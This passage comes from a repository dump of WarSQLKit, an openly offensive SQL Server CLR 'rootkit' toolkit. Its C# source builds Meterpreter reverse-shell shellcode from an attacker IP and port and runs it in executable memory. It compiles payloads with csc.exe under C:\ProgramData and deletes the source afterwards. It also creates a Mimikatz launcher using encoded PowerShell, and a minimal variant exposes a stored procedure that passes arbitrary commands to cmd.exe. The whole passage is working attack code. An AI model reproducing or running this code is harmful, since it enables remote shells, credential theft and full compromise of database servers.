"shellCodePacket[1] = 0x05;" + 355 | "shellCodePacket[2] = 0x68;" + 356 | "shellCodePacket[3] = octByte1;" + 357 | "shellCodePacket[4] = octByte2;" + 358 | "shellCodePacket[5] = octByte3;" + 359 | "shellCodePacket[6] = octByte4;" + 360 | "shellCodePacket[7] = 0x68;" + 361 | "shellCodePacket[8] = 0x02;" + 362 | "shellCodePacket[9] = 0x00;" + 363 | "if (inputPort > 256)" + 364 | "{" + 365 | "int portOct1 = inputPort / 256;" + 366 | "int portOct2 = portOct1 * 256;" + 367 | "int portOct3 = inputPort - portOct2;" + 368 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 369 | "if (inputPort == portoct1Calc)" + 370 | "{" + 371 | "port1Byte = Convert.ToByte(portOct1);" + 372 | "port2Byte = Convert.ToByte(portOct3);" + 373 | "shellCodePacket[10] = port1Byte;" + 374 | "shellCodePacket[11] = port2Byte;" + 375 | "}" + 376 | "}" + 377 | "else" + 378 | "{" + 379 | "shellCodePacket[10] = port1Byte;" + 380 | "shellCodePacket[11] = Convert.ToByte(inputPort);" + 381 | "}" + 382 | "shellCodePacket[12] = 0x89;" + 383 | "shellCodePacket[13] = 0xe6;" + 384 | "shellCodePacket[14] = 0x50;" + 385 | 386 | "string shellCodeRaw = \"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\";" + 387 | 388 | "string s3 = Convert.ToBase64String(shellCodePacket);" + 389 | "string newShellCode = shellCodeRaw.Replace(\"agVowKiLhmgCABFcieZQ\", s3);" + 390 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 391 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 392 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 393 | "IntPtr hThread = IntPtr.Zero;" + 394 | "UInt32 threadId = 0;" + 395 | "IntPtr pinfo = IntPtr.Zero;" + 396 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 397 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 398 | "return;" + 399 | "}" + 400 | "catch (Exception e)" + 401 | "{" + 402 | "Console.WriteLine(e);" + 403 | "throw;" + 404 | "}" + 405 | "}" + 406 | 
407 | "private static UInt32 MEM_COMMIT = 0x1000;" + 408 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 409 | "[DllImport(\"kernel32\")]" + 410 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 411 | "[DllImport(\"kernel32\")]" + 412 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 413 | "[DllImport(\"kernel32\")]" + 414 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 415 | 416 | "}" + 417 | "}"; 418 | NetFrameWorkDirectory(); 419 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_rc4.cs", strMtr); 420 | SqlContext.Pipe.Send("Meterpreter C# File created."); 421 | SqlContext.Pipe.Send("CSharp Compiler is running."); 422 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework\"+ _netFrameworkList[_netFrameworkList.Count - 1] + @"\csc.exe /unsafe /platform:x86 /out:C:\ProgramData\" + randomFileName + @"_rc4.exe " + @"C:\ProgramData\" + randomFileName + @"_rc4.cs"); 423 | SqlContext.Pipe.Send("Meterpreter compiled."); 424 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_rc4.cs"); 425 | if (IsRunSystemPriv == true) 426 | { 427 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe C:\ProgramData\" + randomFileName + @"_rc4.exe"); 428 | } 429 | else 430 | { 431 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_rc4.exe"); 432 | } 433 | } 434 | public void SaveMimikatz() 435 | { 436 | SqlContext.Pipe.Send("Mimikatz C# File is being created."); 437 | var strMtr = "using System;" + 438 | "using System.Diagnostics;" + 439 | "using System.Text;" + 440 | "namespace Meterpreter_Test3" + 441 | "{" + 442 | "class Program" + 443 | "{" + 444 | "static void Main(string[] args)" + 445 | 
                "{" +
                "RunMimikatz(\"cmd.exe\", \"/c powershell -enc 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 > C:\\\\ProgramData\\\\mimi.log 2>&1\");" +
                "}" +
                "public static void RunMimikatz(string filename, string arguments)" +
                "{" +
                "var process = new Process();" +
                "process.StartInfo.FileName = filename;" +
                "if (!string.IsNullOrEmpty(arguments))" +
                "{" +
                "process.StartInfo.Arguments = arguments;" +
                "}" +
                "process.StartInfo.CreateNoWindow = true;" +
                "process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;" +
                "process.StartInfo.UseShellExecute = false;" +
                "process.StartInfo.RedirectStandardError = true;" +
                "process.StartInfo.RedirectStandardOutput = true;" +
                "var stdOutput = new StringBuilder();" +
                "process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);" +
                "string stdError = null;" +
                "try" +
                "{" +
                "process.Start();" +
                "process.BeginOutputReadLine();" +
                "stdError = process.StandardError.ReadToEnd();" +
                "process.WaitForExit();" +
                "}" +
                "catch (Exception e)" +
                "{" +
                "}" +
                "if (process.ExitCode == 0)" +
                "{" +
                "}" +
                "else" +
                "{" +
                "var message = new StringBuilder();" +
                "if (!string.IsNullOrEmpty(stdError))" +
                "{" +
                "message.AppendLine(stdError);" +
                "}" +
                "if (stdOutput.Length != 0)" +
                "{" +
                "message.AppendLine(\"Std output:\");" +
                "message.AppendLine(stdOutput.ToString());" +
                "}" +
                "}" +
                "}" +
                "}" +
                "}";
            x64NetFrameWorkDirectory();
            // The generated source is written to disk and compiled by csc.exe as a child of
            // sqlservr.exe. Both the file write under C:\ProgramData and the csc.exe child
            // process are artifacts that file-integrity monitoring and EDR can observe.
            File.WriteAllText(@"C:\ProgramData\mimiPs.cs", strMtr);
            SqlContext.Pipe.Send("Mimikatz C# File created.");
            SqlContext.Pipe.Send("CSharp Compiler is running.");
            BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework64\" + _x64NetFrameworkList[_x64NetFrameworkList.Count - 1]
                + @"\csc.exe /unsafe /platform:x64 /out:C:\ProgramData\MimiPs.exe " + @"C:\ProgramData\mimiPs.cs");
            SqlContext.Pipe.Send("Mimikatz compiled.");
            File.Delete(@"C:\ProgramData\mimiPs.cs");
        }

        // Enumerates the v* folders under the 32-bit Framework directory so the newest csc.exe can be located.
        public static void NetFrameWorkDirectory()
        {
            _netFrameworkList.Clear();
            string targetDirectory = @"C:\Windows\Microsoft.NET\Framework";
            string[] subdirectoryEntries = Directory.GetDirectories(targetDirectory);
            for (int i = 0; i < subdirectoryEntries.Length; i++)
            {
                string[] versionStrings = subdirectoryEntries[i].Split('\\');
                if (versionStrings[(versionStrings.Length - 1)].StartsWith("v"))
                {
                    // Skip the J# folder instead of abandoning the whole scan.
                    if (versionStrings[(versionStrings.Length - 1)].StartsWith("VJ"))
                        continue;
                    _netFrameworkList.Add(versionStrings[(versionStrings.Length - 1)]);
                }
            }
        }

        // Same enumeration for the 64-bit Framework64 directory.
        public static void x64NetFrameWorkDirectory()
        {
            _x64NetFrameworkList.Clear();
            string targetDirectory = @"C:\Windows\Microsoft.NET\Framework64";
            string[] subdirectoryEntries = Directory.GetDirectories(targetDirectory);
            for (int i = 0; i < subdirectoryEntries.Length; i++)
            {
                string[] versionStrings = subdirectoryEntries[i].Split('\\');
                if (versionStrings[(versionStrings.Length - 1)].StartsWith("v"))
                {
                    // Skip the J# folder instead of abandoning the whole scan.
                    if (versionStrings[(versionStrings.Length - 1)].StartsWith("VJ"))
                        continue;
                    _x64NetFrameworkList.Add(versionStrings[(versionStrings.Length - 1)]);
                }
            }
        }

        // Runs a hidden child process and collects its output; errors are reported back through SqlContext.Pipe.
        public void BuildRunMeterpreter(string filename, string arguments)
        {
            var process = new Process();

            process.StartInfo.FileName = filename;
            if (!string.IsNullOrEmpty(arguments))
            {
                process.StartInfo.Arguments = arguments;
            }

            process.StartInfo.CreateNoWindow = true;
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.StartInfo.UseShellExecute = false;

            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.RedirectStandardOutput = true;
            var stdOutput = new StringBuilder();
            process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
            string stdError = null;
            try
            {
                process.Start();
                process.BeginOutputReadLine();
                stdError = process.StandardError.ReadToEnd();
                process.WaitForExit();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }

            // Note: if Start() threw, reading ExitCode below raises InvalidOperationException.
            if (process.ExitCode == 0)
            {
                //SqlContext.Pipe.Send(stdOutput.ToString());
            }
            else
            {
                var message = new StringBuilder();

                if (!string.IsNullOrEmpty(stdError))
                {
                    message.AppendLine(stdError);
                }

                if (stdOutput.Length != 0)
                {
                    message.AppendLine("Std output:");
                    message.AppendLine(stdOutput.ToString());
                }
            }
        }

        // Builds a random alphanumeric name of (end - start) characters.
        public static string RandomFileName(int start, int end)
        {
            var rnd = new Random();
            var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray();
            var randomFName = string.Empty;
            for (var i = start; i < end; i++)
            {
                // Random.Next's upper bound is exclusive, so chr.Length keeps the last character reachable.
                randomFName += chr[rnd.Next(0, chr.Length)].ToString();
            }
            return randomFName;
        }
    }
}
--------------------------------------------------------------------------------
/WarSQLKit/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with the SQLCLR assembly.
[assembly: AssemblyTitle("WarSQLKit")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("MSSQL Rootkit")]
[assembly: AssemblyProduct("Eyup CELIK")]
[assembly: AssemblyCopyright("http://eyupcelik.com.tr")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/WarSQLKit/StoredProcedures.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/StoredProcedures.cs
--------------------------------------------------------------------------------
/WarSQLKit/WarSQLKit.sqlproj:
--------------------------------------------------------------------------------
(XML element tags were lost in extraction; only the property values survive, one property group per line)
Debug AnyCPU WarSQLKit 2.0 4.1 {c6001c77-007a-4851-9371-61828d235c4e} Microsoft.Data.Tools.Schema.Sql.Sql130DatabaseSchemaProvider Database
WarSQLKit WarSQLKit 1033, CI BySchemaAndSchemaType True v4.0 CS Properties False True True
bin\Release\ $(MSBuildProjectName).sql False pdbonly true false true prompt 4
bin\Debug\ $(MSBuildProjectName).sql false true full false true true prompt 4
11.0 True 11.0
bin\Release\ $(MSBuildProjectName).sql False pdbonly true false true prompt 4 x64
bin\Debug\ $(MSBuildProjectName).sql false true full false true true prompt 4 x64
--------------------------------------------------------------------------------
/WarSQLKit/WarSQLKit.sqlproj.user:
--------------------------------------------------------------------------------
(no surviving content)
--------------------------------------------------------------------------------
/WarSQLKit/bin/Debug/Confused/WarSQLKit.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/Confused/WarSQLKit.dll
--------------------------------------------------------------------------------
/WarSQLKit/bin/Debug/WarSQLKit.dacpac:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/WarSQLKit.dacpac
--------------------------------------------------------------------------------
/WarSQLKit/bin/Debug/WarSQLKit.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/WarSQLKit.dll
--------------------------------------------------------------------------------
/WarSQLKit/bin/Debug/WarSQLKit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/WarSQLKit.pdb
--------------------------------------------------------------------------------
/WarSQLKitMinimal/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with the SQLCLR assembly.
[assembly: AssemblyTitle("WarSQLKitMinimal")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Eyup CELIK")]
[assembly: AssemblyCopyright("http://eyupcelik.com.tr")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/WarSQLKitMinimal/StoredProcedure.cs:
--------------------------------------------------------------------------------
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.IO;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    // SQLCLR entry point: the whole argument is handed to cmd.exe /c, so the
    // resulting cmd.exe runs as a child of sqlservr.exe under the service account.
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void CmdExec(string cmd)
    {
        SqlContext.Pipe.Send("Command is running, please wait.");
        SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
    }

    // Runs a hidden child process, captures stdout/stderr and returns stdout.
    public static string RunCommand(string filename, string arguments)
    {
        var process = new Process();

        process.StartInfo.FileName = filename;
        if (!string.IsNullOrEmpty(arguments))
        {
            process.StartInfo.Arguments = arguments;
        }

        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        process.StartInfo.UseShellExecute = false;

        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.RedirectStandardOutput = true;
        var stdOutput = new StringBuilder();
        process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
        string stdError = null;
        try
        {
            process.Start();
            process.BeginOutputReadLine();
            stdError = process.StandardError.ReadToEnd();
            process.WaitForExit();
        }
        catch (Exception e)
        {
            SqlContext.Pipe.Send("OS error while executing " + filename + arguments + ": " + e.Message);
        }

        // Note: if Start() threw, reading ExitCode below raises InvalidOperationException.
        if (process.ExitCode == 0)
        {
            SqlContext.Pipe.Send(stdOutput.ToString());
        }
        else
        {
            var message = new StringBuilder();

            if (!string.IsNullOrEmpty(stdError))
            {
                message.AppendLine(stdError);
            }

            if (stdOutput.Length != 0)
            {
                message.AppendLine("Std output:");
                message.AppendLine(stdOutput.ToString());
            }
            SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
        }
        return stdOutput.ToString();
    }
}
--------------------------------------------------------------------------------
/WarSQLKitMinimal/WarSQLKitMinimal.sqlproj:
--------------------------------------------------------------------------------
(XML element tags were lost in extraction; only the property values survive, one property group per line)
Debug AnyCPU WarSQLKitMinimal 2.0 4.1 {b4e1bee9-3454-4d2f-a6d7-e47fd5b602b8} Microsoft.Data.Tools.Schema.Sql.Sql130DatabaseSchemaProvider Database
WarSQLKitMinimal WarSQLKitMinimal 1033, CI BySchemaAndSchemaType True v4.0 CS Properties False True True
bin\Release\ $(MSBuildProjectName).sql False pdbonly true false true prompt 4
bin\Debug\ $(MSBuildProjectName).sql false true full false true true prompt 4
11.0 True 11.0
bin\Release\ $(MSBuildProjectName).sql False pdbonly true false true prompt 4 x64
bin\Debug\ $(MSBuildProjectName).sql false true full false true true prompt 4 x64
--------------------------------------------------------------------------------
/WarSQLKitMinimal/WarSQLKitMinimal.sqlproj.user:
--------------------------------------------------------------------------------
(no surviving content)
--------------------------------------------------------------------------------
/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dacpac:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dacpac
--------------------------------------------------------------------------------
/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dll
--------------------------------------------------------------------------------
/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.pdb
--------------------------------------------------------------------------------